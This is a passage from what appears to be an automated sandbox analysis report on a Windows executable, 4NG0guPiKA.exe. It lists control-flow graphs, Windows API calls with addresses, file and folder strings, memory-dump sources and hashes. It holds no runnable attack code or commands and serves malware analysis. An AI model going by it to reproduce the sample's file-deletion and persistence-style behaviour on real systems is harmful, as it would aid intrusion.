166->175 176 404ee8-404eea 166->176 167->130 168->130 169->153 170->169 171->135 179 404e05-404e07 171->179 180 404c80-404c87 172->180 178 404d55-404d59 173->178 175->176 182 404eeb-404f04 call 401299 SendMessageW 175->182 176->182 177->147 183 4050c7-4050f1 ShowWindow GetDlgItem ShowWindow 177->183 184 404d73-404d7b call 404164 178->184 185 404d5b-404d6e ShowWindow call 404164 178->185 186 404e09-404e10 179->186 187 404e1a 179->187 188 404d1d-404d30 180->188 189 404c8d-404cb5 180->189 182->138 183->147 184->118 185->147 197 404e12-404e14 186->197 198 404e16-404e18 186->198 201 404e1d-404e39 call 40117d 187->201 188->180 205 404d36-404d3a 188->205 199 404cb7-404ced SendMessageW 189->199 200 404cef-404cf1 189->200 193 404fc5-404fe9 call 4011ef 190->193 194 404f86-404f9f call 4012e2 call 401299 190->194 202 404f78 191->202 203 404f79-404f7c call 404ade 191->203 218 40508b-40509f InvalidateRect 193->218 219 404fef 193->219 224 404fa1-404fa7 194->224 225 404faf-404fbe SendMessageW 194->225 197->201 198->201 199->188 206 404cf3-404d02 SendMessageW 200->206 207 404d04-404d1a SendMessageW 200->207 201->135 202->203 203->190 205->173 205->178 206->188 207->188 218->164 221 4050a1-4050b0 call 404a31 call 404978 218->221 222 404ff2-404ffd 219->222 221->164 226 405073-405085 222->226 227 404fff-40500e 222->227 228 404fa9 224->228 229 404faa-404fad 224->229 225->193 226->218 226->222 231 405010-40501d 227->231 232 405021-405024 227->232 228->229 229->224 229->225 231->232 233 405026-405029 232->233 234 40502b-405034 232->234 236 405039-405071 SendMessageW * 2 233->236 234->236 237 405036 234->237 236->226 237->236
APIs
• GetDlgItem.USER32(?,000003F9), ref: 00404B28
• GetDlgItem.USER32(?,00000408), ref: 00404B33
• GlobalAlloc.KERNEL32(00000040,?), ref: 00404B7D
• LoadBitmapW.USER32(0000006E), ref: 00404B90
• SetWindowLongW.USER32(?,000000FC,00405108), ref: 00404BA9
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BBD
• ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BCF
• SendMessageW.USER32(?,00001109,00000002), ref: 00404BE5
• SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404BF1
• SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C03
• DeleteObject.GDI32(00000000), ref: 00404C06
• SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C31
• SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C3D
• SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CD3
• SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404CFE
• SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D12
• GetWindowLongW.USER32(?,000000F0), ref: 00404D41
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D4F
• ShowWindow.USER32(?,00000005), ref: 00404D60
• SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E5D
• SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EC2
• SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404ED7
• SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404EFB
• SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F1B
• ImageList_Destroy.COMCTL32(?), ref: 00404F30
• GlobalFree.KERNEL32(?), ref: 00404F40
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FB9
• SendMessageW.USER32(?,00001102,?,?), ref: 00405062
• SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405071
• InvalidateRect.USER32(?,00000000,00000001), ref: 00405091
• ShowWindow.USER32(?,00000000), ref: 004050DF
• GetDlgItem.USER32(?,000003FE), ref: 004050EA
• ShowWindow.USER32(00000000), ref: 004050F1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
Similarity
• API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
• String ID: $M$N
• API String ID: 1638840714-813528018
• Opcode ID: db08064a331c8b710d2bfbefb5f5365b1a6743964771edbed48d05eba51cbb05
• Instruction ID: d71a5cbf05b966a5fca8a5aa47d1df2e6c399d67ef135bcf6f64f468dd7cdb7f
• Opcode Fuzzy Hash: db08064a331c8b710d2bfbefb5f5365b1a6743964771edbed48d05eba51cbb05
• Instruction Fuzzy Hash: 6E027FB0900209EFEB209F54DD85AAE7BB5FB84314F10857AF610BA2E0D7799D52CF58

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 483 405f0c-405f17 484 405f19-405f28 483->484 485 405f2a-405f40 483->485 484->485 486 405f46-405f53 485->486 487 406158-40615e 485->487 488 405f59-405f60 486->488 489 406164-40616f 487->489 490 405f65-405f72 487->490 488->487 492 406171-406175 call 405eea 489->492 493 40617a-40617b 489->493 490->489 491 405f78-405f84 490->491 494 406145 491->494 495 405f8a-405fc6 491->495 492->493 497 406153-406156 494->497 498 406147-406151 494->498 499 4060e6-4060ea 495->499 500 405fcc-405fd7 GetVersion 495->500 497->487 498->487 503 4060ec-4060f0 499->503 504 40611f-406123 499->504 501 405ff1 500->501 502 405fd9-405fdd 500->502 505 405ff8-405fff 501->505 502->501 508 405fdf-405fe3 502->508 509 406100-40610d call 405eea 503->509 510 4060f2-4060fe call 405e31 503->510 506 406132-406143 lstrlenW 504->506 507 406125-40612d call 405f0c 504->507 511 406001-406003 505->511 512 406004-406006 505->512 506->487 507->506 508->501 515 405fe5-405fe9 508->515 520 406112-40611b 509->520 510->520 511->512 518 406042-406045 512->518 519 406008-40602e call 405db7 512->519 515->501 521 405feb-405fef 515->521 524 406055-406058 518->524 525 406047-406053 GetSystemDirectoryW 518->525 531 406034-40603d call 405f0c 519->531 532 4060cd-4060d1 519->532 520->506 523 40611d 520->523 521->505 527 4060de-4060e4 call 40617e 523->527 529 4060c3-4060c5 524->529 530 40605a-406068 GetWindowsDirectoryW 524->530 528 4060c7-4060cb 525->528 527->506 528->527 528->532 529->528 533 40606a-406074 529->533 530->529 531->528 532->527 536 4060d3-4060d9 lstrcatW 532->536 538 406076-406079 533->538 539 40608e-4060a4 SHGetSpecialFolderLocation 533->539 536->527 538->539 543 40607b-406082 538->543 540 4060a6-4060bd SHGetPathFromIDListW CoTaskMemFree 539->540 541 4060bf 539->541 540->528 540->541 541->529 544 40608a-40608c 543->544 544->528 544->539
APIs
• GetVersion.KERNEL32(00000000,004216B0,?,004051CB,004216B0,00000000,00000000,00000000), ref: 00405FCF
• GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 0040604D
• GetWindowsDirectoryW.KERNEL32(Call,00000400), ref: 00406060
• SHGetSpecialFolderLocation.SHELL32(?,?), ref: 0040609C
• SHGetPathFromIDListW.SHELL32(?,Call), ref: 004060AA
• CoTaskMemFree.OLE32(?), ref: 004060B5
• lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004060D9
• lstrlenW.KERNEL32(Call,00000000,004216B0,?,004051CB,004216B0,00000000,00000000,00000000), ref: 00406133
Strings
Memory Dump Source
• Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
Similarity
• API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
• String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
• API String ID: 900638850-1230650788
• Opcode ID: 9fe4ffeb513939a43d7003ef0179ff27352b89f5fe06c0b94729ac98e3d3bc3e
• Instruction ID: 201fcfe404e7502d8ff22bbbb8bc1db0d7d07a9235330109bbd625d5d43c8b09
• Opcode Fuzzy Hash: 9fe4ffeb513939a43d7003ef0179ff27352b89f5fe06c0b94729ac98e3d3bc3e
• Instruction Fuzzy Hash: 93612371A40516EBDB209F24CC44AAF37A5EF00314F51813BE546BA2E0D73D8AA2CB4E

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 545 405772-405798 call 405a3d 548 4057b1-4057b8 545->548 549 40579a-4057ac DeleteFileW 545->549 551 4057ba-4057bc 548->551 552 4057cb-4057db call 405eea 548->552 550 40592e-405932 549->550 553 4057c2-4057c5 551->553 554 4058dc-4058e1 551->554 558 4057ea-4057eb call 405981 552->558 559 4057dd-4057e8 lstrcatW 552->559 553->552 553->554 554->550 557 4058e3-4058e6 554->557 560 4058f0-4058f8 call 40622d 557->560 561 4058e8-4058ee 557->561 563 4057f0-4057f4 558->563 559->563 560->550 569 4058fa-40590e call 405935 call 40572a 560->569 561->550 566 405800-405806 lstrcatW 563->566 567 4057f6-4057fe 563->567 568 40580b-405827 lstrlenW FindFirstFileW 566->568 567->566 567->568 570 4058d1-4058d5 568->570 571 40582d-405835 568->571 585 405910-405913 569->585 586 405926-405929 call 405194 569->586 570->554 576 4058d7 570->576 573 405855-405869 call 405eea 571->573 574 405837-40583f 571->574 587 405880-40588b call 40572a 573->587 588 40586b-405873 573->588 577 405841-405849 574->577 578 4058b4-4058c4 FindNextFileW 574->578 576->554 577->573 581 40584b-405853 577->581 584 4058ca-4058cb FindClose 578->584 581->573 581->578 584->570 585->561 589 405915-405924 call 405194 call 405d84 585->589 586->550 598 4058ac-4058af call 405194 587->598 599 40588d-405890 587->599 588->578 590 405875-40587e call 405772 588->590 589->550 590->578 598->578 600 405892-4058a2 call 405194 call 405d84 599->600 601 4058a4-4058aa 599->601 600->578 601->578
                                                                                                            APIs
                                                                                                            • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,774D2EE0,"C:\Users\user\Desktop\4NG0guPiKA.exe"), ref: 0040579B
                                                                                                            • lstrcatW.KERNEL32(004246D8,\*.*,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,774D2EE0,"C:\Users\user\Desktop\4NG0guPiKA.exe"), ref: 004057E3
                                                                                                            • lstrcatW.KERNEL32(?,00409014,?,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,774D2EE0,"C:\Users\user\Desktop\4NG0guPiKA.exe"), ref: 00405806
                                                                                                            • lstrlenW.KERNEL32(?,?,00409014,?,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,774D2EE0,"C:\Users\user\Desktop\4NG0guPiKA.exe"), ref: 0040580C
                                                                                                            • FindFirstFileW.KERNELBASE(004246D8,?,?,?,00409014,?,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,774D2EE0,"C:\Users\user\Desktop\4NG0guPiKA.exe"), ref: 0040581C
                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 004058BC
                                                                                                            • FindClose.KERNEL32(00000000), ref: 004058CB
                                                                                                            Strings
                                                                                                            • "C:\Users\user\Desktop\4NG0guPiKA.exe", xrefs: 0040577B
                                                                                                            • \*.*, xrefs: 004057DD
                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405780
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                            • String ID: "C:\Users\user\Desktop\4NG0guPiKA.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                            • API String ID: 2035342205-3920782197
                                                                                                            • Opcode ID: 91addf2f7801abc8b01003351af1a773a3a4ecd8c4e6fa2132f7e8029f9d92b7
                                                                                                            • Instruction ID: 64b0c8684543101156bed993c7ef625b5cb6937b92a1292c702a5556077473ca
                                                                                                            • Opcode Fuzzy Hash: 91addf2f7801abc8b01003351af1a773a3a4ecd8c4e6fa2132f7e8029f9d92b7
                                                                                                            • Instruction Fuzzy Hash: 4341B031800914EADF217B619C89ABF7678EF45728F10817BF800B51D1D77C4992DE6E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 30143bd0a3c86c84675fe989439f4e854c087b2e65987d853f873e8b3ce332d5
                                                                                                            • Instruction ID: edf170fb2c3714e597751af3e8fd03d842b3b080db723bf9ee749212abe0df6d
                                                                                                            • Opcode Fuzzy Hash: 30143bd0a3c86c84675fe989439f4e854c087b2e65987d853f873e8b3ce332d5
                                                                                                            • Instruction Fuzzy Hash: D3F17771D00229CBCF28CFA8C8946ADBBB1FF44305F25856ED856BB281D7785A96CF44
                                                                                                            APIs
                                                                                                            • FindFirstFileW.KERNELBASE(?,00425720,00424ED8,00405A86,00424ED8,00424ED8,00000000,00424ED8,00424ED8,?,?,774D2EE0,00405792,?,C:\Users\user\AppData\Local\Temp\,774D2EE0), ref: 00406238
                                                                                                            • FindClose.KERNEL32(00000000), ref: 00406244
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Find$CloseFileFirst
                                                                                                            • String ID: WB
                                                                                                            • API String ID: 2295610775-2854515933
                                                                                                            • Opcode ID: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
                                                                                                            • Instruction ID: f398094869b5afba054f99dea52ba5834f85055b19877d8081192ff4b2f0d438
                                                                                                            • Opcode Fuzzy Hash: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
                                                                                                            • Instruction Fuzzy Hash: DAD012319480209BC21037387E0C85B7A59AB493307524AB7F82AF27E0C738AC6586AD
                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000008), ref: 00406266
                                                                                                            • LoadLibraryA.KERNELBASE(?,?,00000020,0040339D,00000008), ref: 00406271
                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00406282
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                            • String ID:
                                                                                                            • API String ID: 310444273-0
                                                                                                            • Opcode ID: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
                                                                                                            • Instruction ID: 46d0f10fa6fb29b22d4bf355a321a76136a9e9be6b3571ea53230c25cba9bd22
                                                                                                            • Opcode Fuzzy Hash: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
                                                                                                            • Instruction Fuzzy Hash: 02E0CD36A08120ABC7115B309D44D6773BCAFE9601305053DF505F6240C774AC1297A9
                                                                                                            APIs
                                                                                                            • CoCreateInstance.OLE32(00407474,?,00000001,00407464,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020BD
                                                                                                            Strings
                                                                                                            • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet, xrefs: 004020FB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateInstance
                                                                                                            • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet
                                                                                                            • API String ID: 542301482-406486772
                                                                                                            • Opcode ID: 57f4e40bbc1eb8bc1193217420ff9fbc7ed6710042c31834a7e6d6b3d9fbdd66
                                                                                                            • Instruction ID: b9114a0b4d3c9f05545c6126c0c632b8b73b1fcf7d0bd01aa9b6132af3d7cd36
                                                                                                            • Opcode Fuzzy Hash: 57f4e40bbc1eb8bc1193217420ff9fbc7ed6710042c31834a7e6d6b3d9fbdd66
                                                                                                            • Instruction Fuzzy Hash: 4B414F75A00105BFCB00DFA4C988EAE7BB5AF49318B20416AF505EF2D1D679AD41CB55

                                                                                                            Control-flow Graph

                                                                                                            control_flow_graph 238 4038b4-4038cc call 406254 241 4038e0-403917 call 405db7 238->241 242 4038ce-4038de call 405e31 238->242 246 403919-40392a call 405db7 241->246 247 40392f-403935 lstrcatW 241->247 250 40393a-403963 call 403b8a call 405a3d 242->250 246->247 247->250 256 4039f5-4039fd call 405a3d 250->256 257 403969-40396e 250->257 263 403a0b-403a30 LoadImageW 256->263 264 4039ff-403a06 call 405f0c 256->264 257->256 258 403974-40399c call 405db7 257->258 258->256 268 40399e-4039a2 258->268 266 403ab1-403ab9 call 40140b 263->266 267 403a32-403a62 RegisterClassW 263->267 264->263 281 403ac3-403ace call 403b8a 266->281 282 403abb-403abe 266->282 269 403b80 267->269 270 403a68-403aac SystemParametersInfoW CreateWindowExW 267->270 272 4039b4-4039c0 lstrlenW 268->272 273 4039a4-4039b1 call 405962 268->273 278 403b82-403b89 269->278 270->266 275 4039c2-4039d0 lstrcmpiW 272->275 276 4039e8-4039f0 call 405935 call 405eea 272->276 273->272 275->276 280 4039d2-4039dc GetFileAttributesW 275->280 276->256 284 4039e2-4039e3 call 405981 280->284 285 4039de-4039e0 280->285 291 403ad4-403af1 ShowWindow LoadLibraryW 281->291 292 403b57-403b5f call 405267 281->292 282->278 284->276 285->276 285->284 294 403af3-403af8 LoadLibraryW 291->294 295 403afa-403b0c GetClassInfoW 291->295 300 403b61-403b67 292->300 301 403b79-403b7b call 40140b 292->301 294->295 297 403b24-403b47 DialogBoxParamW call 40140b 295->297 298 403b0e-403b1e GetClassInfoW RegisterClassW 295->298 302 403b4c-403b55 call 403804 297->302 298->297 300->282 303 403b6d-403b74 call 40140b 300->303 301->269 302->278 303->282
                                                                                                            APIs
                                                                                                              • Part of subcall function 00406254: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000008), ref: 00406266
                                                                                                              • Part of subcall function 00406254: LoadLibraryA.KERNELBASE(?,?,00000020,0040339D,00000008), ref: 00406271
                                                                                                              • Part of subcall function 00406254: GetProcAddress.KERNEL32(00000000,?), ref: 00406282
                                                                                                            • lstrcatW.KERNEL32(1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000,00000006,C:\Users\user\AppData\Local\Temp\,774D3420,00000000,"C:\Users\user\Desktop\4NG0guPiKA.exe"), ref: 00403935
                                                                                                            • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet,1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000,00000006,C:\Users\user\AppData\Local\Temp\), ref: 004039B5
                                                                                                            • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet,1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000), ref: 004039C8
                                                                                                            • GetFileAttributesW.KERNEL32(Call), ref: 004039D3
                                                                                                            • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet), ref: 00403A1C
                                                                                                              • Part of subcall function 00405E31: wsprintfW.USER32 ref: 00405E3E
                                                                                                            • RegisterClassW.USER32(00428180), ref: 00403A59
                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A71
                                                                                                            • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403AA6
                                                                                                            • ShowWindow.USER32(00000005,00000000), ref: 00403ADC
                                                                                                            • LoadLibraryW.KERNELBASE(RichEd20), ref: 00403AED
                                                                                                            • LoadLibraryW.KERNEL32(RichEd32), ref: 00403AF8
                                                                                                            • GetClassInfoW.USER32(00000000,RichEdit20W,00428180), ref: 00403B08
                                                                                                            • GetClassInfoW.USER32(00000000,RichEdit,00428180), ref: 00403B15
                                                                                                            • RegisterClassW.USER32(00428180), ref: 00403B1E
                                                                                                            • DialogBoxParamW.USER32(?,00000000,00403C57,00000000), ref: 00403B3D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmp
